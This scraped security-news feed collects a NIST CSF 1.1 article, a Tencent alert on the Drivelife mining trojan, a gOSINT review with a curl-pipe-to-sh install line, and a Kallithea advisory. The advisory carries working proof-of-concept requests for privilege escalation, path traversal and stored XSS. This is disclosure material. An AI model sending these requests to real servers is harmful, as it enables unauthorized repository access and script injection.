其中一位知情人士表示,英特尔目前将自己视为迈克菲纯粹的财务投资者,如果 Thoma Bravo 的交易成功,英特尔有望收复之前损失的投资。两名知情人士表示,交易将统一迈克菲的所有权,并可能使其重新上市。

路透社 (Reuters) 去年11月报道称,Thoma Bravo 已向赛门铁克提出收购要约。其中一位知情人士表示,收购 McAfee 将排除赛门铁克 (Symantec) 的可能性。

TPG 和英特尔的发言人拒绝置评。布拉沃的发言人没有立即回应。

一篇文章了解NIST关键基础设施保护的升级版

$
0
0

2014年2月12日,美国国家标准技术研究院(NIST)正式发布了《提升关键基础设施网络安全的框架》第1.0版本。《提升关键基础设施网络安全的框架》的基本思想,是一套着眼于安全风险,应用于关键基础设施广阔领域的安全风险管控的流程。


一篇文章了解NIST关键基础设施保护的升级版

该文件是奥巴马总统颁布的第13636号行政命令的产物,其开发目的是形成一套适用于各类工业技术领域的安全风险管控的“通用语言”,同时为确保可扩展性与开展技术创新,此框架力求做到“技术中性化”,即:第一依赖于现有的各种标准、指南和实践,使关键基础设施供应商获得弹性能力。第二依赖于全球标准、指南和实践(行业开发、管理、更新实践),实现框架效果的工具和方法将适用于跨国界,承认网络安全风险的全球性,并随着技术发展和业务需求而进一步发展框架。

因此,从某种角度上来观察,该文件就是一份“用于关键基础设施安全风险管控的标准化实施指南”,以帮助那些负责提供国家金融、能源、医疗保健和其他关键系统的组织更好地保护其信息和资产安全,抵御网络攻击。

如今,在初始版本发布4年后,美国国家标准与技术研究院(NIST)再次发布了《提升关键基础设施网络安全的框架》1.1版本。

与初始版本一样,框架1.1版本也是基于公众意见征询收集到的反馈、团队成员收到的问题,以及多次研讨会做出的修改所产生的公私合作成果。可以说,新版本是对1.0版本的提炼、阐明和改进。1.1版本仍具有灵活性,可满足组织机构的业务或任务需求,并适用于各种技术环境,例如信息技术、工业控制系统和物联网。

据悉,框架1.1版本中更新的内容包括:

身份验证和身份; 自我评估网络安全风险; 供应链中的网络安全风险管理; 漏洞披露; 新版本的变化之处

首先,1.1版本已经将“访问控制”类别更新为“身份管理和访问控制”,以便更好地考虑身份验证以及授权等内容。

此外,新版本中还增加了一个名为“第4.0节:使用框架自我评估网络安全风险”的新内容,解释了组织如何使用该框架来理解和评估其网络安全风险,包括测量标准的使用等。

该文件指出,网络安全性能标准的发展正在发生巨变,组织应该周到、富有创造性,并且谨慎地使用测量方法来优化使用,力求在改善网络安全风险管理方面取得进展。判断网络风险需要准则指导,且这些准则必须定期评估和更新,以适应不断变化的时代需求。

在供应链方面,扩展的第3.3节可以帮助用户更好地理解这一领域的风险管理,而新增的部分(3.4节)则侧重于购买决策,以及使用框架来理解与“商用货架产品”(Commercial-off-the-shelf,简称COTS,指可以采购到的具有开放式标准定义的接口的软件或硬件产品)相关的风险。

该框架强调了“网络供应链风险管理在解决关键基础设施和更广泛的数字经济中的网络安全风险所起到的关键作用”。该框架的“实施层”为组织机构提供了机制,供其了解网络安全风险管理方法的特征,并提供网络安全风险审视方法和管理风险的流程,以帮助组织机构确定优先级并实现网络安全目标。

“实施层”指的是组织机构安全风险管理实践的程度,衡量标准包括风险与威胁意识、可重复和自适应等要素。实施层通过四个层级范围描述组织机构的实践程度,各层级(从部分的层级1到自适应的层级4)反映了从非正式、被动响应到自适应的表现。该框架指出,在确定实施层级的过程中,组织机构应考虑当前的风险管理实践、威胁环境、法律法规要求、业务/任务目标和限制条件。

其他更新内容还包括对实施层和配置文件之间关系的更好解释;考虑到组织机构使用框架的具体方式非常多样,所以围绕“合规性”这一术语增加了更多细化解释;并增加了与漏洞披露生命周期相关的子类别。

关于新框架的讨论和后续考虑

该框架的执行摘要写道:

虽然本文件旨在改进关键基础架构中的网络安全风险管理,但该框架可供任何部门或社区的组织使用。该框架使组织(无论规模、网络安全风险程度或网络安全复杂程度)能够将风险管理的原则和最佳实践应用于提高安全性和恢复能力等方面。

因此,其目标是保持足够的灵活性,以便所有行业部门的大小企业和组织,以及联邦、州和地方政府都能够自愿采用。此外,值得注意的是,该框架不仅仅只是涉及技术和流程,而是全面涵盖了人员、流程和技术。

到目前为止,该框架的采用率已经相当可观。根据Gartner提供的数据显示,2015年只有30%的美国组织使用该框架,但到2020年这一数字预计将增加到 50% 。

与几乎所有数据安全标准一样,NIST网络安全框架是非强制性的。虽然网络专业人员经常需要采用这些标准和框架文档作为工具来并帮助构建所需的保护性架构,但是专业人员通常会根据自身情况(如企业规模、具体网络环境等)选择适用的工具。

然而,特朗普签署的名为“增强联邦政府网络和关键基础设施网络安全”的行政命令,从联邦政府网络、关键基础设施和国家整体安全三个层面提出增强网络安全措施。此举可以理解为,要求联邦机构遵守NIST网络安全框架。因为该行政命令要求机构负责人向OMB(行政管理和预算局 )提交风险管理报告,并描述其实施该框架的具体计划。

鉴于目前的指令,所有主要政府承包商也可能会面临类似的要求。

针对同一个问题,公共政策讲师兼哈佛大学Belfer科学与国际事务中心联合主任Eric Rosenbach在一份书面陈词中告诉参议员:国会应该要求所有关键基础设施提供商采用该框架。

Rosenbach引用了最近针对亚特兰大市和波音公司的勒索软件攻击事件,强调了关键基础设施领域存在明显的威胁需要解决。

网络风险影响着我们经济和社会的各个方面。这是一个全国性的威胁。只有通过全国的共同努力才能成功解决这个问题。当然,在此过程中,政府必须发挥主导作用。但是最终,私营企业和非政府组织的行动才是决定我们成功与否的关键所在。

今年晚些时候,NIST计划发布更新的配套文件――《改进关键基础设施网络安全路线图》,该文件描述了开发、协调和协作的关键领域。

正如网络安全框架项目经理Matt Barrett所说:

网络安全框架需要随着威胁、技术和行业的发展而发展。通过此次更新,我们已经证明,我们有一个良好的流程来将利益相关者聚集在一起,以确保该框架仍然是管理网络风险的一个很好的工具。

《提升关键基础设施网络安全的框架》1.1版本原文:

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

腾讯电脑管家病毒预警:“驱动人生木马”感染10万电脑 已查杀

$
0
0
[ 摘要 ]这款木马病毒会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,对企业信息安全威胁巨大,建议广大企业用户重点关注,下周一上班之后检查内网中毒主机,发现后做下线处理。

12月14日下午,腾讯电脑管家监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。腾讯电脑管家可精准拦截该病毒攻击,管家团队也将持续跟踪该款病毒并同步相关信息。


腾讯电脑管家病毒预警:“驱动人生木马”感染10万电脑 已查杀

病毒下载的木马被电脑管家清除

值得注意的是,因为这款木马病毒会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,对企业信息安全威胁巨大,建议广大企业用户重点关注,下周一上班之后检查内网中毒主机,发现后做下线处理。

电脑管家经过追溯病毒传播链发现,此款病毒自12月14日约14点,利用“驱动人生”、“人生日历”等软件最早开始传播,传播源是该软件中的dtlupg.exe(疑似升级程序)。

腾讯安全专家指出,本次病毒爆发约70%的传播是通过驱动人生升级通道进行的,约30%通过“永恒之蓝”漏洞进行自传播,入侵用户机器后,会下载执行云控木马,并利用“永恒之蓝”漏洞在局域网内进行主动扩散。病毒作者可通过云端控制中毒电脑并收集电脑部分信息,中毒电脑会在云端指令下进行门罗币挖矿。目前,腾讯电脑管家正在密切关注该病毒的进一步行动,普通用户不必担心,可使用腾讯电脑管家等安全软件防御查杀此类病毒。


腾讯电脑管家病毒预警:“驱动人生木马”感染10万电脑 已查杀

腾讯御点成功拦截通过永恒之蓝漏洞传播的木马

针对该木马病毒对企业信息安全带来的潜在威胁,腾讯安全反病毒实验室负责人、腾讯电脑管家安全专家马劲松也建议广大企业用户,可暂时关闭服务器不必要的端口,如135、139、445;使用腾讯御点终端安全管理系统的漏洞修复功能,及时修复系统高危漏洞;服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;推荐部署腾讯御界高级威胁检测系统检测可能的黑客攻击。该系统可高效检测未知威胁,并通过对企业内外网边界处网络流量的分析,感知漏洞的利用和攻击。


腾讯电脑管家病毒预警:“驱动人生木马”感染10万电脑 已查杀

腾讯御界高级威胁检测系统成功感知该威胁

15日凌晨,驱动人生官微发布声明,称“产品少部分未更新的老版本升级组件漏洞被恶意利用攻击,目前新版已启用全新升级组件。建议各老版本用户手动更新升级版本”。

Kallithea <= 0.3.4 Incorrect access control and XSS

$
0
0
Homepage:

https://kallithea-scm.org/security/

Description: Introduction

1. This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

This allows the user to get full admin access to the repository.

edit_permissions_update and edit_permissions_revoke are not decorated with @HasRepoPermissionAllDecorator('repository.admin') .

File: kallithea\controllers\admin\repos.py

def edit_permissions_update(self, repo_name): form = RepoPermsForm()().to_python(request.POST) RepoModel()._update_permissions(repo_name, form['perms_new'], form['perms_updates']) #TODO: implement this #action_logger(self.authuser, 'admin_changed_repo_permissions', # repo_name, self.ip_addr, self.sa) Session().commit() h.flash(_('Repository permissions updated'), category='success') return redirect(url('edit_repo_perms', repo_name=repo_name)) def edit_permissions_revoke(self, repo_name): try: obj_type = request.POST.get('obj_type') obj_id = None if obj_type == 'user': obj_id = safe_int(request.POST.get('user_id')) elif obj_type == 'user_group': obj_id = safe_int(request.POST.get('user_group_id')) if obj_type == 'user': RepoModel().revoke_user_permission(repo=repo_name, user=obj_id) elif obj_type == 'user_group': RepoModel().revoke_user_group_permission( repo=repo_name, group_name=obj_id ) #TODO: implement this #action_logger(self.authuser, 'admin_revoked_repo_permissions', # repo_name, self.ip_addr, self.sa) Session().commit() except Exception: log.error(traceback.format_exc()) h.flash(_('An error occurred during revoking of permission'), category='error') raise HTTPInternalServerError()

POC:

Set your your_token_here and your_username .

After this your_username obtains repository.admin access to not_my_secret_repo .

POST /not_my_secret_repo/settings/permissions HTTP/1.1 Host: localhost:5000 Content-Length: 225 Connection: close _method=put&_authentication_token=%your_token_here%&repo_private=False&u_perm_default=repository.admin&perm_new_member_1=repository.admin&perm_new_member_name_1=%your_username%&perm_new_member_type_1=user&save=Save

2. This vulnerability allows a normal user to access the contents of repositories they do not normally have access to.

User can access any repository through clone functionality if he knows its name.

clone_uri inside create_repo API call is not properly validated so it’s possible to pass local path to this parameter.

Newly created repository contains exact copy of repository that you don’t have access to.

POC:

GET /_admin/api HTTP/1.1 Host: localhost:5000 Content-Length: 168 Connection: close {"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"repo_copy","clone_uri":"C:\\kalithea\\repo_dir\\secret_repo"}}

3. This vulnerability allows a normal user to clone a repository to a filesystem path outside the Kallithea repository root.

repo_name inside create_repo API call is not properly validated.

It’s possible to set it to something like: ../../../upper_dir

POC:

GET /_admin/api HTTP/1.1 Host: localhost:5000 Connection: close Content-Length: 126 {"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"../../../upper_dir"}}

4. This vulnerability allows a normal user to inject code into pages visible to other users/visitors of Kallithea (XSS).

repo_name inside create_repo API call is not properly validated and vulnerable to XSS attack.

XSS is visible after you click: “Repositories button” and also inside _admin/repo_groups/new (if you set different payload).

POC:

GET /_admin/api HTTP/1.1 Host: localhost:5000 Content-Length: 140 Connection: close {"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"<img src=x onerror=alert(1)>/sth"}} POC

POC Files on Github

Timeline: 12-12-2018: Release

GOSINT:开源智能(OSINT)方面较新的一款工具

$
0
0

GOSINT是一款使用Go语言编写的开源智能信息收集工具。由于该工具刚推出不久,因此目前仍处在开发之中。我们也欢迎任何愿意为该工具做出贡献的人,加入到我们的开发之中。在某些方面,gOSINT可以说比Recon-ng更具优势。你可以在此阅读我之前 关于Recon-ng评估的帖子 。

gOSINT依赖于开源OCR引擎Tesseract,libtesseract-dev和libleptonica-dev,在使用之前必须先在机器上安装它们。另外,gOSINT同时支持linuxwindows系统。

在Linux系统上安装它的最简单方法是使用go get命令,该系统也是黑客或渗透测试人员最喜欢使用的操作系统。

go get github.com/Nhoya/gOSINT/cmd/gosint

我们也可以使用以下命令克隆存储库来安装它:

git clone https://github.com/Nhoya/gOSINT.git

然后手动安装依赖项:

curl https://raw.githubusercontent.com/golang/dep/master/install.sh | sh

(无需使用Golang)

Recon-ng优于gOSINT的一点是它的安装更为简单,因为它的大部分依赖性通常已在大多数Linux版本中可用(并且已被集成在Kali Linux上)。

安装完成后,我们就可以使用迄今为止已在gOSINT中集成和实现的几个模块。首先,我们导航到可以运行gOSINT的目录。

root@prismacsi:~/go/src/github.com/Nhoya/gOSINT/cmd/gosint#

然后键入:

./gosint help
GOSINT:开源智能(OSINT)方面较新的一款工具

查看该工具的帮助信息。

可以看到到目前为止,gOSINT已经实现了以下模块:

1.Git支持使用github API或普通克隆和搜索进行邮件检索 2.在PGP服务器中搜索电子邮件地址,别名和KeyID 3.从hadibeenpawned.com搜索泄露的电子邮件地址 4.检索Telegram公共组消息历史 5.发送查询到shodan.io 6.检索电话号码所有者名称 7.使用crt.sh枚举子域

有些模块的功能尚未完善,如前所述gOSINT仍在开发中。让我们来看看已经实现的少数几个模块。

PGP MODULE

此模块将会为我们在Pretty Good Privacy(PGP)服务器中搜索电子邮件地址,别名和KeyID。

此模块使用命令格式如下:

./gosint pgp <domain_name>

以下结果来自两个示例域名。


GOSINT:开源智能(OSINT)方面较新的一款工具
GOSINT:开源智能(OSINT)方面较新的一款工具

现在,让我们来比较下gOSINT和recon-ng的结果(同样是那两个域名)。


GOSINT:开源智能(OSINT)方面较新的一款工具

不难看出,虽然gOSINT的界面没有recon-ng的好,但相较于recon-ng它能为我们提供更加详细的结果。当然,这并不意味着recon-ng不能完成任务。相反,recon-ng直接将检索到的数据保存在其内部数据库中,这更便于用户日后的侦察利用。

PNI MODULE

此模块将会为我们在sync.me服务器中查找电话号码并返回所有者的名称。但目前该模块还存在一些待解决的问题,例如验证码限制还未解决。但我相信在后续的开发中,这一问题将会得到解决。以下截图显示了可以从当前状态模块所获取的结果。


GOSINT:开源智能(OSINT)方面较新的一款工具

Recon-ng中没有执行该功能的模块,但有一个模块能够返回与给定主机或域名关联的电子邮件地址和名称列表。如下截图所示:


GOSINT:开源智能(OSINT)方面较新的一款工具
GOSINT:开源智能(OSINT)方面较新的一款工具
PWD MODULE

该模块会为我们从hasibeenpawned.com服务上检索,是否存在泄露的电子邮件地址。这可能是黑客攻击目标的潜在来源。因此,渗透测试人员会建议显示电子邮件地址公司的员工,采取更好的主动防护措施来保护其电子邮件帐户。

使用命令格式如下:

./gosint pwd <email_address>

示例:


GOSINT:开源智能(OSINT)方面较新的一款工具
SHODAN MODULE

这是本文为大家介绍的最后一个模块。根据其维基百科的定义,Shodan是一个搜索引擎,允许用户通过自定义过滤器查找连接到互联网的特定类型计算机。

关于gOSINT的Shodan实现仍然是基本的,但它执行预期的功能包括发现蜜罐,这些蜜罐通常用于捕获攻击行为并对其进行分析,从而进一步加强企业自身的安全防护能力。

./gosint shodan 23.22.39.120 honeypot

返回结果如下:


GOSINT:开源智能(OSINT)方面较新的一款工具

shodan.io允许在应用各种过滤器时执行多种不同的搜索,但迄今为止在gOSINT的shodan模块中实现的并不多。随着越来越多的开发人员参与到该项目中,相信在未来该模块会实现更多的功能。相比起recon-ng,gOSINT仍有很长的路要走。以下是recon-ng中shodan模块的执行结果。可以看到,该模块为我们返回了与指定域名关联的多个主机名。


GOSINT:开源智能(OSINT)方面较新的一款工具
GOSINT:开源智能(OSINT)方面较新的一款工具

这也再次证明了recon-ng在这方面的优越性,这对于任何希望在OSINT侦察中节省时间的渗透测试人员或黑客来说至关重要。这就是为什么大多黑客在入侵或试图渗透某些计算机系统/基础设施之前,首先选择使用recon-ng工具的原因。但近些年来recon-ng在改进开发方面开始陷入自己的瓶颈期,因此在这个领域也迫切需要新鲜血液的注入。一旦所有模块都正常启动并运行,gOSINT就有可能成为一个非常强大的侦察工具。相信时间会证明这一切!

*参考来源: prismacsi ,FB小编secist编译,转载请注明来自CodeSec.Net

Viewing all 12749 articles
Browse latest View live